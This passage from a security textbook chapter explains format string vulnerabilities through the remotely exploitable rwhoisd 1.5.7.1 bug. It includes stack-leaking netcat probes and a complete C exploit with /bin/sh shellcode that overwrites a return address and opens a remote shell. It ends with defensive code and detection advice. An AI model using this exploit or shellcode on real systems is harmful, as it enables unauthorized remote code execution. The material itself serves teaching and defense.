pointers are variables that the programmer creates and must be present in the
program for an attacker to exploit them. In addition to this, the function must
be called by reference using the function pointer for the attacker's shellcode to
execute.
Examining a Vulnerable Program
We'll now decide on a program to use to demonstrate the exploitation of a
format string vulnerability. The vulnerability should be remotely exploitable.
Penetration of computer systems by attackers from across the Internet without
any sort of credentials beforehand best demonstrates the seriousness of format
string vulnerabilities. The vulnerability should be real, in a program with a
well-known or respected author, to demonstrate that vulnerabilities can and do
exist in software we may trust to be well written. Our example should also have
several properties that allow us to explore the different aspects of exploiting
format string vulnerabilities, such as outputting the formatted string.
The program we will use as our example is called Rwhoisd. Rwhoisd, or the
RWHOIS daemon, is an implementation of the RWHOIS service. The research
and development branch of Network Solutions, Inc. currently maintains the
rwhoisd RWHOIS server and it is published under the GNU General Public License.
A classic remotely exploitable format string vulnerability exists in versions
1.5.7.1 of rwhoisd and earlier. The format string vulnerability allows for
unauthenticated clients who can connect to the service to execute arbitrary
code. The vulnerability was first made public through a post to the Bugtraq
mailing list (the message is archived at www.securityfocus.com/archive/1/222756).
To understand the format string vulnerability that was present in rwhoisd,
we must look at its source code. The version we are examining is version
1.5.7.1. At the time of writing, it is available for download at the Web site
www.rwhois.net/ftp.
Notes from the Underground…
Some High Profile Format String Vulnerabilities
Besides the WU-FTPD SITE EXEC format string vulnerability, there have
been several others worth mentioning. Some of these have been used in
worms and mass-hacking utilities and have directly resulted in thousands
of hosts being compromised.
• IRIX Telnetd: Client-supplied data included in the format
  string argument for syslog() allowed for remote attackers to
  execute arbitrary code without authenticating. This vulnerability
  was discovered by the Last Stage of Delirium. (See
  www.securityfocus.com/bid/1572.)
• Linux rpc.statd: This format string vulnerability was due to
  the misuse of syslog() as well and could also be exploited to
  gain root privileges remotely. It was discovered by Daniel
  Jacobowitz and published on July 16, 2000 in a post to
  Bugtraq. (See www.securityfocus.com/bid/1480.)
• Cfingerd: Another format string vulnerability due to syslog(),
  discovered by Megyer Laszlo. Successful exploitation can
  result in remote attackers gaining control of the underlying
  host. (See www.securityfocus.com/bid/2576.)
• Multiple Vendor LibC Locale Implementation: Jouko
  Pynnonen and Core SDI independently discovered a format
  string vulnerability in the C library implementations shipped
  with several UNIX systems. The vulnerability allowed for
  attackers to gain elevated privileges locally by exploiting
  setuid programs. (See www.securityfocus.com/bid/1634.)
• Multiple CDE Vendor rpc.ttdbserverd: ISS X-Force discovered
  a vulnerability related to the misuse of syslog() in versions
  of the ToolTalk database server daemon shipped with
  several operating systems that include CDE. This vulnerability
  allows for remote, unauthenticated attackers to execute arbitrary
  code on the victim host. (See www.securityfocus.com/bid/3382.)
The vulnerability is present when an error message in response to an invalid
argument to the -soa command is to be output.
Error messages are created and output using a standard function called
print_error(). This function is called throughout the server source code to handle
reporting of error conditions to the client or user. It accepts an integer argument
to specify the error type as well as a format string and a variable number of
arguments. The source code to this function is in the common/client_msgs.c
source file (path is relative to the directory created when the 1.5.7.1 source
tarball is unarchived).
/* prints to stdout the error messages. Format: %error ### message
   text, where ### follows rfc 640 */
void
print_error(va_alist)
    va_dcl
{
    va_list list;
    int i;
    int err_no;
    char *format;

    if (printed_error_flag)
    {
        return;
    }
    va_start(list);
    err_no = va_arg(list, int);
    for (i = 0; i < N_ERRS; i++)
    {
        if (errs[i].err_no == err_no)
        {
            printf("%%error %s", errs[i].msg);
            break;
        }
    }
    format = va_arg(list, char*);
    if (*format)
    {
        printf(": ");
    }
    vprintf(format, list);
    va_end(list);
    printf("\n");
    printed_error_flag = TRUE;
}
The vprintf(format, list) call (the bolded line in the original listing) is
where the arguments passed to this function are passed to vprintf(). The format
string vulnerability is not in this particular function, but in the use of it.
Print_error() relies on the calling function to pass it a valid format string
and any associated variables.
This function is listed here because it is a good example of the kind of
situation that leads to exploitable format string vulnerabilities. Many programs
have functions very similar to print_error(). It is a wrapper for printing error
messages in the style of syslog(), with an error code and printf() style variable
arguments. The problem though, as discussed in the beginning of the chapter, is
that programmers may forget that a format string argument must be passed.
We will now look at what happens when a client connects to the service and
attempts to pass format string data to the vprintf() function through the
print_error() wrapper.
For those of you who have downloaded the source code, the offending section
of code is in the server/soa.c source file. The function in which the offending
code exists is called soa_parse_args(). The surrounding code has been stripped for
brevity. The vulnerable call, the print_error() invocation, is on line 53 (it is
in bold in the original listing):
..
auth_area = find_auth_area_by_name(argv[i]);
if (!auth_area)
{
    print_error(INVALID_AUTH_AREA, argv[i]);
    free_arg_list(argv);
    dl_list_destroy(soa_arg);
    return NULL;
}
In this instance of print_error(), the variable argv[i] is passed as the format
string argument to print_error(). The string will eventually be passed to the
vprintf() function (as previously pointed out). To a source code auditor, this
looks suspiciously exploitable. The proper way to call this function would be:
print_error(INVALID_AUTH_AREA, "%s", argv[i]);
In this example, argv[i] is passed to the print_error() function as a variable
corresponding to the %s (string) token in the format string. Calling the function
this way prevents any maliciously placed format specifiers in argv[i] from being
interpreted or acted upon by the vprintf() called by print_error().
The string argv[i] is the argument to the -soa directive passed to the server by
the client.
To summarize, when a client connects to the rwhoisd server and issues a -soa
command, an error message is output via print_error() if the arguments are invalid.
The path of execution leading up to this looks like this:
1. Server receives -soa argument, and calls soa_directive() to handle the
command.
2. soa_directive() passes the client command to soa_parse_args(), which
interprets the arguments to the directive.
3. soa_parse_args() detects an error and passes an error code and the command
string to the print_error() function as the format string argument.
4. print_error() passes the format string containing data from the client to
the vprintf() function (highlighted in the previous section).
It is clear now that remote clients can have data passed to vprintf() as the
format string variable. This data is the argument to the -soa directive. By
connecting to the service and supplying a malicious format string, attackers can
write to memory belonging to the server process.
Testing with a Random Format String
Having located a possible format string vulnerability in the source code, we can
now attempt to demonstrate that it is exploitable through supplying malicious
input and observing the server reaction.
Programs with suspected format string vulnerabilities can be forced to exhibit
some form of behavior that indicates their presence. If the vulnerable program
outputs the formatted string, the presence of the vulnerability is obvious. If
the vulnerable program does not output the formatted string, the behavior of the
program in response to certain format specifiers can suggest the presence of a
format string vulnerability.
If the process crashes when %n%n is input, it's likely that a memory access
violation occurred when attempting to write to invalid addresses read from the
stack. It is possible to identify vulnerable programs by supplying these format
specifiers to a program that does not output the formatted string. If the process
crashes, or if the program does not return any output at all and appears to
terminate, it is likely that there is a format string vulnerability.
Back to our example, the formatted string is returned to the client as part of
the server error response. This makes the job of an attacker looking for a way
into the host simple. The following example demonstrates the output of rwhoisd
that is indicative of a format string bug:
[dma@victim server]$ nc localhost 4321
%rwhois V-1.5:003fff:00 victim (by Network Solutions, Inc. V-1.5.7.1)
-soa am_%i_vulnerable
%error 340 Invalid Authority Area: am_-1073743563_vulnerable
In this example, connecting to the service and transmitting a format specifier
in the data suspected to be included as a format string variable caused
-1073743563 to be included in the server output where the literal %i should be.
The negative number output is the interpretation, as a signed integer, of the
4 bytes on the stack where the printf function was expecting a variable. This is
confirmation that there is a format string vulnerability in rwhoisd.
Having identified a format string vulnerability both in the program source
code and through program behavior, we should set about exploiting it. This
particular vulnerability is exploitable by a remote client from across a
network. It does not require any authentication and it is likely that it can be
exploited by attackers to gain access to the underlying host.
In cases such as this, where a program outputs a formatted string, it is possible
to read the contents of the stack to aid in successful exploitation. Complete
words of memory can be retrieved in the following manner:
[dma@victim server]$ nc localhost 4321
%rwhois V-1.5:003fff:00 victim (by Network Solutions, Inc. V-1.5.7.1)
-soa %010p
%error 340 Invalid Authority Area: 0xbffff935
-soa %010p%010p
%error 340 Invalid Authority Area: 0xbffff9350x0807fa80
-soa %010p%010p%010p
%error 340 Invalid Authority Area: 0xbffff9350x0807fa800x00000001
-soa %010p%010p%010p%010p
%error 340 Invalid Authority Area: 0xbffff9350x0807fa800x000000010x08081cd8
In this example, the client retrieved one, two, three, and four words from the
stack. They have been formatted in a way that can be parsed automatically by an
exploit. A well-written exploit can use this output to reconstruct the stack
layout in the server process. The exploit can read memory from the stack until
the format string itself is located, and then calculate automatically the
location where the %n writes should begin in the format string.
%rwhois V-1.5:003fff:00 victim (by Network Solutions, Inc. V-1.5.7.1)
-soa %010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p
%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%c%c%c%c%c
%error 340 Invalid Authority Area: 0xbffff9350x0807fa800x000000010x0807
fc300xbffff8f40x0804f21e0xbffff9350xbffff9350xbffff90c0x0804a6a30xbffff9
35(nil)0xbffff9300xbffffb640xbffff9200x0804eca10xbffff9300xbffff9300x000
000040xbffffb300x0804ef4e0xbffff9300x000000050x616f732d0x31302500010%p
In this example, the client has caused the printf function to search the stack
for variables where the format string is stored. The 010%p characters at the end
of the output (in bold in the original) are the beginning of the client-supplied
string, containing the very format specifiers being processed. If the attacker
were to embed an address at the beginning of their format string, and use a %n
token where the %c specifiers are, the address in the format string would be the
one written to.
Tools & Traps…
More Stack with Less Format String
It may be the case that the format string in the stack cannot be reached
by the printf function when it is reading in variables. This may occur for
several reasons, one of which is truncation of the format string. If the
format string is truncated to a maximum length at some point in the
program's execution before it is sent to the printf function, the number
of format specifiers that can be used is limited. There are a few ways to
get past this obstacle when writing an exploit.
The idea behind getting past this hurdle and reaching the
embedded address is to have the printf function read more memory
with less format string. There are a number of ways to accomplish this:
• Using Larger Data Types: The first and most obvious method
  is to use format specifiers associated with larger datatypes,
  one of which is %lli, corresponding to the long long integer
  type. On 32-bit Intel architecture, a printf function will read 8
  bytes from the stack for every instance of this format specifier
  embedded in a format string. It is also possible to use
  floating-point format specifiers for double and long double
  values, though the stack data may cause floating point
  operations to fail, resulting in the process crashing.
• Using Output Length Arguments: Some versions of libc support
  the * token in format specifiers. This token tells the
  printf function to obtain the number of characters that will
  be output for this specifier from the stack as a function argument.
  For each *, the function will eat another 4 bytes. The
  output value read from the stack can be overridden by
  including a number next to the actual format specifier. For
  example:
  The format specifier %*******10i will result in an integer
  represented using 10 characters. Despite this, the printf
  function will eat 32 bytes when it encounters this format
  specifier.
  The first use of this method is credited to an individual
  known as lorian.
• Accessing Arguments Directly: It is also possible to have the
  printf function reference specific parameters directly. This can
  be accomplished by using format specifiers in the form
  %x$n, where x is the number of the argument (in order). This
  technique is possible only on platforms with C libraries that
  support access of arguments directly.
Having exhausted these tricks and still not able to reach an address
in the format string, the attacker should examine the process to determine
if there is anywhere else in a reachable region of the stack where
addresses can be placed. Remember that it is not required that the
address be embedded in the format string, just that it is convenient
since it is often near in the stack. Data supplied by the attacker as input
other than the format string may be reachable. In the Screen vulnerability,
it was possible to access a variable that was constructed using the
HOME environment variable. This string was closer in the stack than anything
else externally supplied and could barely be reached.
Writing a Format String Exploit
Now we move on to actually exploiting a format string vulnerability. The goal of
the attacker, in the case of a program such as rwhoisd, is to force it to execute
instructions that are attacker-supplied. These instructions should grant access to
the attacker on the underlying host.
The exploit will be written for rwhoisd version 1.5.7.1, compiled on an i386
Linux system. This is the program we looked at earlier. As previously mentioned,
to execute shellcode, the exploit must overwrite a value that is referenced by the
process at some point as the address of instructions to be executed. In the exploit
we are developing, we will be overwriting a function return address with a
pointer to shellcode. The shellcode will exec() /bin/sh and provide shell access
to the client.
The first thing that the exploit code must do is connect to the service and
attempt to locate the format string in the stack. The exploit code does this by
connecting to the service and supplying format strings that incrementally return
words from the stack to the exploit. The function in the exploit that does this is
called brute_force(). This function sends format string specifiers that cause
increasing amounts of stack memory to be output by the server. The exploit then
compares each word in the stack output to 0x62626262, which was placed at
the beginning of the format string. There is a chance that the alignment may be
off; this exploit does not take that possibility into account.
if((*ptr == '0') && (*(ptr+1) == 'x'))
{
    memcpy(segment,ptr,10);
    segment[10] = '\0';
    chekit = strtoul(segment,NULL,16);
    if(chekit == FINDME)
    {
        printf("*b00m*: found address #1: %i words away.\n",i);
        foundit = i;
        return foundit;
    }
    ptr += 10;
}
The stack output is parsed easily by the exploit due to the use of the %010p
format specifier by the exploit. The %010p formats each word as an 8-character
hex representation preceded by 0x. Each of these string representations of words
can be passed to a C library function such as strtoul and returned as a binary
(unsigned with strtoul()) integer data type.
The goal of this exploit is to execute arbitrary code. To do this, we must
overwrite some value that will be used to reference instructions to be executed.
One such value that can be overwritten is a function return address. As discussed
earlier, stack-based buffer overflows usually overwrite these values because the
return address happens to exist on the stack and gets overwritten in an overflow
condition. We will replace a function return address simply because it's
convenient.
Our goal is to overwrite the return address stored when print_error() is called.
In the binary version used to write this proof of concept, the address of this
return address on the stack when we can overwrite it is 0xbffff8c8. This address
will serve as our target.
Once the exploit has located the format string in the stack, it must construct
a new format string with the %n specifiers at the right position for the supplied
addresses to be used when writing. This can be accomplished by using format
specifiers such as %x to eat as many words of the stack as are required. This
exploit does this automatically based on the results of the brute_force() function.
for(i = 0;i<num-1;i++)
{
strncat(str,"%x",2); // work our way to where target is
}
The num variable in the code listed originates from the brute force location
of the format string. Now that the exploit has an address to write to, we must
construct an address at the target location.
The return address must be overwritten using the successive writes we discussed
earlier. In order to construct a 4-byte address, the four writes must occur
at different offsets from the start of the word. The addresses must also be
placed in the format string:
*((long *)(str+8)) = TARGET; // target
*((long *)(str+16)) = TARGET+1;
*((long *)(str+24)) = TARGET+2;
*((long *)(str+32)) = TARGET+3;
str[36] = '\0';
The next step is to write the correct value at each of the offsets. The value
we are writing is the location of shellcode that we have placed in the stack. The
address for this example proof of concept is 0xbffff99d.
To construct this value, we must write the following low-order bytes to each
address in our format string:
TARGET - 9d
TARGET+1 - f9
TARGET+2 - ff
TARGET+3 - bf
This can be accomplished by using the padded format specifiers we discussed
earlier to write the desired low-order bytes.
For example, writing %125x might cause the value 0x0000019d to be
written to TARGET. That's perfect for our situation because 9d will be the value
of the byte we want to write. By using padded format specifiers and successive
writes, we can construct the address we want at the target location:
strncat(str,"%227x",5); // padding
strncat(str,"%n",2); // first write
strncat(str,"%92x",4); // padding
strncat(str,"%n",2); // second write
strncat(str,"%262x",5); // padding
strncat(str,"%n",2); // third write
strncat(str,"%192x",5); // padding
strncat(str,"%n",2); // fourth write
It should be noted that the padding value used is highly dependent on the
total number of characters being output in the formatted string. It is possible to
determine how many characters to pad automatically if the formatted string is
output.
Once the function return address is overwritten, vfprintf() will return normally
and the shellcode will be executed once print_error() returns. Figure 9.2 demonstrates
successful exploitation of this vulnerability.
Figure 9.2 Exploitation of the rwhoisd Format String Vulnerability to Penetrate a Host
The exploit code follows:
// proof of concept
// written for rwhoisd 1.5.7.1 compiled on a Linux/i386 system
//
// overwrites return address at 0xbffff8c8 and replaces it with
// address of shellcode (for this binary)
// the shellcode is based on that which was included
// in an exploit written by 'CowPower'.
// http://www.securityfocus.com/archive/1/222756
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/errno.h>
#include <linux/in.h>
extern int errno;
#define FINDME 0x62626262 // we need to find this in the stack
#define TARGET 0xbffff8c8 // the address that we are overwriting
void gen_str(char *str, int found,int target);
unsigned int brute_force(int s, char *str,char *reply);
void session(int s);
int main(int argc, char *argv[])
{
int s;
fd_set fd;
int amt;
struct sockaddr_in sa;
struct sockaddr_in ca;
int where = 0;
char reply[5000]; // receive buffer
char str[1000]; // send buffer
str[0] = '-'; // - directive prefix
str[1] = 's';
str[2] = 'o';
str[3] = 'a';
str[4] = ' '; // padding
str[5] = ' '; // padding
str[6] = ' '; // padding
str[7] = ' '; // padding
*((long *)(str+8)) = FINDME; // find me in the stack
str[12] = '\0';
bzero(&ca,sizeof(struct sockaddr_in));
bzero(&sa,sizeof(struct sockaddr_in));
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket:");
}
if (bind(s,&ca,sizeof(struct sockaddr_in)) < 0)
{
perror("bind:");
}
sa.sin_addr.s_addr = inet_addr("127.0.0.1");
sa.sin_port = htons(4321);
sa.sin_family = AF_INET;
if (connect(s,&sa,sizeof(struct sockaddr_in)) < 0)
{
perror("connect");
}
where = brute_force(s,reply,str); // brute force
gen_str(str,where,TARGET); // generate exploit string
write(s,str,strlen(str)); // send exploit code
while(1)
{
amt = read(s,reply,1);
if (reply[0] == '\n')
break;
}
write(s,"id;\n",4);
amt = read(s,reply,1024);
reply[amt] = '\0';
if ((reply[0] == 'u') && (reply[1] == 'i') && (reply[2] == 'd'))
{
printf("*b00m*: %s\n",reply);
session(s);
}
else
{
printf("exploit attempt unsuccessful..\n");
}
close(s);
exit(0);
}
unsigned int brute_force(int s,char *reply, char *str)
{
// this function searches the stack on the victim host
// for the format string
int foundit = 0;
int amt = 0;
int i = 0;
amt = read(s,reply,500); // read in the header, junk
reply[amt] = '\0';
while(!foundit)
{
strncat(str,"%010p",5);
write(s,str,strlen(str)+1);
write(s,"\n",1);
amt = read(s,reply,1024);
if (amt == 0)
{
fprintf(stderr,"Connection closed.\n");
close(s);
exit(-1);
}
reply[amt] = '\0';
amt = 0;
i = 0;
while(reply[amt-1] != '\n')
{
i += amt;
amt = read(s, reply+i, 1024);
if (amt == 0)
{
fprintf(stderr,"Connection closed.\n");
close(s);
exit(-1);
}
}
reply[amt] = '\0';
foundit = find_addr(reply);
}
}
int find_addr(char *str)
{
// this function parses server output.
// searches in words from the stack for
// the format string
char *ptr;
char segment[11];
unsigned long chekit = 0;
int i = 0;
int foundit = 0;
ptr = str + 6;
while((*ptr != '\0') && (*ptr != '\n'))
{
if((*ptr == '0') && (*(ptr+1) == 'x'))
{
memcpy(segment,ptr,10);
segment[10] = '\0';
chekit = strtoul(segment,NULL,16);
if(chekit == FINDME)
{
printf("*b00m*: found address #1: %i words away.\n",i);
foundit = i;
return foundit;
}
ptr += 10;
}
else if ((*ptr == ' ') && (*(ptr+1) == ' '))
{
ptr += 10; // 0x00000000
}
i++;
}
return foundit;
}
void gen_str(char *str,int num,int target)
{
// this function generates the exploit string
// it contains the addresses to write to,
// the format specifiers (padding, %n's)
// and the shellcode
int i;
char *shellcode =
"\x90\x31\xdb\x89\xc3\x43\x89\xcb\x41\xb0\x3f\xcd\x80\xeb\x25\x5e"
"\x89\xf3\x83\xc3\xe0\x89\x73\x28\x31\xc0\x88\x43\x27\x89\x43\x2c"
"\x83\xe8\xf5\x8d\x4b\x28\x8d\x53\x2c\x89\xf3\xcd\x80\x31\xdb"
"\x31\xc0\x40\xcd\x80\xe8\xd6\xff\xff\xff/bin/sh";
memset(str+8,0x41,992); // clean the buffer
*((long *)(str+8)) = TARGET; // place the addresses
*((long *)(str+16)) = TARGET+1; // in the buffer
*((long *)(str+24)) = TARGET+2;
*((long *)(str+32)) = TARGET+3;
*((long *)(str+36)) = TARGET+4;
str[36] = '\0';
for(i = 0;i<num-1;i++)
{
strncat(str,"%x",2); // work our way to where target is
}
// the following section is binary dependent
strncat(str,"%227x",5); // padding
strncat(str,"%n",2); // first write
strncat(str,"%92x",4); // padding
strncat(str,"%n",2); // second write
strncat(str,"%262x",5); // padding
strncat(str,"%n",2); // third write
strncat(str,"%192x",5); // padding
strncat(str,"%n",2); // fourth write
strncat(str,shellcode,strlen(shellcode)); // insert the shellcode
strncat(str,"\n",1); // terminate with a newline
}
void session(int s)
{
// this function facilitates communication with a
// shell exec()'d on the victim host.
fd_set fds;
int i;
char buf[1024];
FD_ZERO(&fds);
while(1)
{
FD_SET(s, &fds);
FD_SET(0, &fds);
select(s+1, &fds, NULL, NULL, NULL);
if (FD_ISSET(0,&fds))
{
i = 0;
bzero(buf,sizeof(buf));
fgets(buf,sizeof(buf)-2, stdin);
write(s,buf,strlen(buf));
}
else
if (FD_ISSET(s,&fds))
{
i = 0;
bzero(buf,sizeof(buf));
if ((i = read(s,buf,1024)) == 0)
{
printf("connection lost.\n");
exit(0);
}
buf[i] = '\0';
printf("%s",buf);
}
}
}
Summary
Format string vulnerabilities are one of the newest additions to the typical
hacker's bag of tricks.
Techniques hackers use to exploit bugs in software have become significantly
more sophisticated in the past couple of years. One of the reasons for this
is that there are simply more hackers, and more eyes poring over and scrutinizing
source code. It's also much easier to obtain information about how vulnerabilities and
weaknesses can be exploited and how systems function.
In general, hackers have woken up to the different consequences that programmatic
flaws can have. Printf functions, and bugs due to misuse of them, have
been around for years, but until recently no one had conceived that they
could be exploited to force execution of shellcode. In addition to
format string bugs, new techniques have emerged, such as overwriting malloc
structures, relying on free() to overwrite pointers, and exploiting signed integer index errors.
Hackers are more aware of what to look for, and how subtle bugs in software
can be exploited. Hackers are now peering into every program, observing
behavior in response to every possible kind of input. It is now more important
than ever for programmers to be conscious that many kinds of bugs thought to
be harmless can have disastrous consequences if left unfixed. System administrators
and users should be aware that exploitable bugs never considered critical may
lie latent in software they use.
Solutions Fast Track
Understanding Format String Vulnerabilities
Format string vulnerabilities are due to programmers allowing externally
supplied data to be used as the format string argument of a printf() function.
Format string vulnerabilities can allow an attacker to read and write
to memory.
Format string vulnerabilities can lead to the execution of arbitrary code
through overwriting of return addresses, GOT entries, function pointers,
and so on.
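As a minimal sketch of the first point, the helper below (render_message is a
hypothetical name, not taken from the chapter) passes untrusted text as an
argument to a constant "%s" format rather than as the format itself, so any
specifiers in the input are copied literally instead of being interpreted.

```c
#include <stdio.h>

/* Hypothetical helper: copies untrusted text into out through a constant
 * format string. The unsafe variant would be snprintf(out, cap, untrusted),
 * which lets the input supply its own format specifiers. */
int render_message(char *out, size_t cap, const char *untrusted)
{
    return snprintf(out, cap, "%s", untrusted);
}
```

Called with the input %x%x%n, this leaves out holding the literal text %x%x%n.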
Examining a Vulnerable Program
Vulnerable programs typically have printf() calls with variables passed as
the format string argument.
Wrappers for printf() functions often lead to programmers forgetting that
a function accepts format strings and variable arguments.
Misuse of the syslog() function is responsible for a large number of
format string vulnerabilities, many of them high-profile.
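One way to keep a wrapper from hiding its printf-like nature is to tell the
compiler about it. The sketch below assumes GCC or Clang, whose format
attribute makes the compiler check callers of the wrapper the same way it
checks printf() itself. The name log_msg and its buffer-based signature are
illustrative only.

```c
#include <stdarg.h>
#include <stdio.h>

/* Hypothetical logging wrapper. The attribute is a GCC/Clang extension:
 * argument 3 is the format string, arguments from 4 onward are checked
 * against it. Other compilers need a different mechanism. */
int log_msg(char *dst, size_t cap, const char *fmt, ...)
#if defined(__GNUC__)
    __attribute__((format(printf, 3, 4)))
#endif
    ;

int log_msg(char *dst, size_t cap, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(dst, cap, fmt, ap);
    va_end(ap);
    return n;
}
```

Callers holding untrusted text would write log_msg(buf, sizeof buf, "%s", text).
The same pattern applies to syslog(): syslog(LOG_INFO, "%s", text) rather than
syslog(LOG_INFO, text).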
Testing with a Random Format String
Programs can be tested for format string vulnerabilities by observing
their behavior when format specifiers are supplied in various inputs.
Supplying %s, %x, %p, and other format specifiers reveals a format string
vulnerability if data from memory is output in place
of them. You can't always tell immediately that there is a format string
vulnerability if the results are not being output.
A process crash caused by %n or %s format specifiers supplied as
input indicates that there is a format string vulnerability.
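The probing approach above can be turned into a small regression check for
your own code. This is only a sketch: render_fn is an assumed signature for
the function under test, and the probe deliberately avoids %n and %s so that a
vulnerable function is more likely to produce altered output than to crash.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical signature for the code under test: renders input into out. */
typedef int (*render_fn)(char *out, size_t cap, const char *input);

/* Returns 1 if the renderer changed the probe (suggesting that it
 * interpreted the specifiers), 0 if the probe came back verbatim. */
int interprets_format(render_fn render)
{
    const char *probe = "%x.%x.%p";
    char out[128];

    out[0] = '\0';
    render(out, sizeof out, probe);
    return strcmp(out, probe) != 0;
}

/* Example of a correct renderer, used here as the function under test. */
int safe_render(char *out, size_t cap, const char *input)
{
    return snprintf(out, cap, "%s", input);
}
```

A renderer that passes its input straight through as the format argument would
return hexadecimal values in place of the probe, and interprets_format() would
report 1.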
Writing a Format String Exploit
Format string exploits can be written that read memory or write
specific values to memory. Format string vulnerabilities are not
necessarily platform dependent. It is possible to exploit programs such as
Screen without relying on architecture and OS-dependent shellcode.
In format string vulnerabilities where the formatted string is output to
the attacker, memory can be read to aid in exploitation. Exploits can
reconstruct the process stack and automatically determine where to
place %n specifiers.
Format string exploits can use successive writes to overwrite
targets in memory with arbitrary values. This technique can be used to
write a custom value to almost any location in memory.
On platforms where unaligned writes are not permitted (such as many RISC
architectures), the %hn format specifier can be used to write short values
on 2-byte boundaries.
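The write primitive rests on ordinary, documented printf behavior: %n stores
the number of characters produced so far into an int, and %hn stores it into a
short. The harmless sketch below uses constant format strings and illustrative
function names. Some hardened C libraries restrict or omit %n, so treat this as
a demonstration of the standard semantics rather than of every platform.

```c
#include <stdio.h>

/* Returns the count that %n stores after a field padded to 10 columns. */
int count_after_padding(void)
{
    char buf[32];
    int written = -1;

    snprintf(buf, sizeof buf, "%10d%n", 7, &written);
    return written;
}

/* Same idea with %hn, which stores the count into a short. */
short short_count_after_padding(void)
{
    char buf[32];
    short written = -1;

    snprintf(buf, sizeof buf, "%5d%hn", 7, &written);
    return written;
}
```

The field width controls the stored value: the first function returns 10 and
the second returns 5. This is why the padding specifiers in an exploit string
depend on the value being written.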
Frequently Asked Questions
The following Frequently Asked Questions, answered by the authors of this book,
are designed to both measure your understanding of the concepts presented in
this chapter and to assist you with real-life implementation of these concepts. To
have your questions about this chapter answered by the author, browse to
www.syngress.com/solutions and click on the "Ask the Author" form.
Q: Can nonexecutable stack configurations or stack protection schemes such as
StackGuard protect against format string exploits?
A: Unfortunately, no. Format string vulnerabilities allow an attacker to write
to almost any location in memory. StackGuard protects the integrity of stack
frames, while nonexecutable stack configurations do not allow instructions in
the stack to be executed. Format string vulnerabilities allow both of these
protections to be evaded. Hackers can replace values used to reference
instructions other than function return addresses to avoid StackGuard, and
can place shellcode in areas such as the heap. Although protections such as
nonexecutable stack configurations and StackGuard may stop some publicly
available exploits, determined and skilled hackers can usually get around
them.
Q: Are format string vulnerabilities UNIX specific?
A: No. Format string vulnerabilities are common in UNIX systems because of
the more frequent use of the printf functions. Misuse of the syslog interface
also contributes to many of the UNIX-specific format string vulnerabilities.
The exploitability of these bugs (involving writing to memory) depends on
whether the C library implementation of printf supports %n. If it does, any
program linked to it with a format string bug can theoretically be exploited
to execute arbitrary code.
Q: How can I find format string vulnerabilities?
A: Many format string vulnerabilities can easily be picked out in source code. In
addition, they can often be detected automatically by examining the arguments
passed to printf() functions. Any printf() family call that has only a single argument
is an obvious candidate, if the data being passed is externally supplied.
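The single-argument check described in the answer on finding format string
vulnerabilities can be approximated with a very crude line scanner. The sketch
below is a heuristic with a hypothetical function name: it only looks at plain
printf( calls on one line and flags those whose first argument is not a string
literal. Compilers do this far more reliably; GCC and Clang, for example,
offer the -Wformat-security warning.

```c
#include <ctype.h>
#include <string.h>

/* Returns 1 if the line contains a plain printf( call whose first
 * argument does not start with a string literal, 0 otherwise.
 * Calls such as fprintf( or snprintf( are skipped because their
 * format string is not the first argument. */
int printf_with_nonliteral_format(const char *line)
{
    const char *p = line;

    while ((p = strstr(p, "printf(")) != NULL) {
        int plain = (p == line) ||
                    !(isalnum((unsigned char)p[-1]) || p[-1] == '_');
        const char *arg = p + strlen("printf(");

        while (*arg == ' ' || *arg == '\t')
            arg++;
        if (plain && *arg != '"' && *arg != '\0')
            return 1;
        p = arg;
    }
    return 0;
}
```

A flagged line is only a candidate for review: whether it is a real
vulnerability still depends on whether the argument can be influenced by
external input.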
Q: How can I eliminate or minimize the risk of unknown format string vulnerabilities
in programs on my system?
A: A good start is having a sane security policy. Rely on the least-privilege
model: ensure that only the most necessary utilities are installed setuid and
that they can be run only by members of a trusted group. Disable or block access to all
services that are not completely necessary.
Q: What are some signs that someone may be trying to exploit a format string
vulnerability?
A: This question is relevant because many format string vulnerabilities are due to
bad use of the syslog() function. When a format string vulnerability due to
syslog() is exploited, the formatted string is output to the log stream. An
administrator monitoring the syslog logs can identify format string exploitation
attempts by the presence of strange-looking syslog messages. Other,
more general signs are daemons that disappear or crash regularly due to access
violations.
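For text that is recorded verbatim (for example, request data captured before
it is formatted), a rough filter for suspicious lines can be sketched as
follows. The function names and the threshold are assumptions chosen for
illustration. Where syslog() has already expanded the string, the log will show
the formatted output rather than the raw specifiers, so this check will not
catch every attempt.

```c
#include <string.h>

/* Counts '%' characters that start a conversion (that is, not "%%"). */
int count_directives(const char *s)
{
    int count = 0;

    while (*s) {
        if (s[0] == '%' && s[1] == '%') {
            s += 2;
        } else if (s[0] == '%' && s[1] != '\0') {
            count++;
            s++;
        } else {
            s++;
        }
    }
    return count;
}

/* Flags a line containing %n or at least `threshold` directives. */
int looks_suspicious(const char *line, int threshold)
{
    return strstr(line, "%n") != NULL || count_directives(line) >= threshold;
}
```

A threshold of around four is only a starting point: legitimate data such as
URL-encoded text can contain many percent signs, so flagged lines need human
review.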
Q: Where can I learn more about finding and exploiting format string
vulnerabilities?
A: There are a number of excellent papers on the subject. Tim Newsham
authored a whitepaper published by Guardent, which can be found at
www.securityfocus.com/archive/1/81565. Papers written by TESO
(www.team-teso.net/articles/formatstring) and HERT
(www.hert.org/papers/format.html) are also recommended.